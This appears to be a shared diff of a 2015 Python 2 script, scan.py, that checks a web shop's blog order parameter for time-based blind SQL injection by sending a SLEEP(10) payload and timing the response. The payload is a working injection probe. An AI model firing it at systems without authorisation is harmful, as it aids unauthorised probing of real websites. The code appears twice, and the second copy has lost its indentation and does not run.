allardhoeve · August 29, 2015 14:22
diff --git a/scan.py b/scan.py
 #!/usr/bin/env python
 import requests
 import argparse
 import datetime
 import uuid

 parser = argparse.ArgumentParser()
 parser.add_argument('base_url', type=str, help="The base url of the shop, e.g. http://amsterdamflowers.nl/")

 args = parser.parse_args()
 base_url = args.base_url.rstrip('/')

 uuid = uuid.uuid4()
 start = datetime.datetime.now()
 payload = " AND 1=((SELECT 'THIS IS BYTE TESTING YOUR SHOP %s' FROM (SELECT SLEEP(10))A)) OR 1234=4321" % uuid
 response = requests.get("%s/blog?order=created_time%s" % (base_url, payload), headers={"Cache-Control": "no-cache"}, verify=False)

 end = datetime.datetime.now()
 duration = end - start
 vulnurable = duration > datetime.timedelta(seconds=3)

 if vulnurable:
    print "VULN: response took %s.%s seconds and returned %s" % (duration.seconds, duration.microseconds, response.status_code)
 else:
    print "SAFE (%s)" % response.status_code

 print response.request.url
	#!/usr/bin/env python
	import requests
	import argparse
	import datetime
	import uuid

	parser = argparse.ArgumentParser()
	parser.add_argument('base_url', type=str, help="The base url of the shop, e.g. http://amsterdamflowers.nl/")

	args = parser.parse_args()
	base_url = args.base_url.rstrip('/')

	uuid = uuid.uuid4()
	start = datetime.datetime.now()
	payload = " AND 1=((SELECT 'THIS IS BYTE TESTING YOUR SHOP %s' FROM (SELECT SLEEP(10))A)) OR 1234=4321" % uuid
	response = requests.get("%s/blog?order=created_time%s" % (base_url, payload), headers={"Cache-Control": "no-cache"}, verify=False)

	end = datetime.datetime.now()
	duration = end - start
	vulnurable = duration > datetime.timedelta(seconds=3)

	if vulnurable:
	print "VULN: response took %s.%s seconds and returned %s" % (duration.seconds, duration.microseconds, response.status_code)
	else:
	print "SAFE (%s)" % response.status_code

	print response.request.url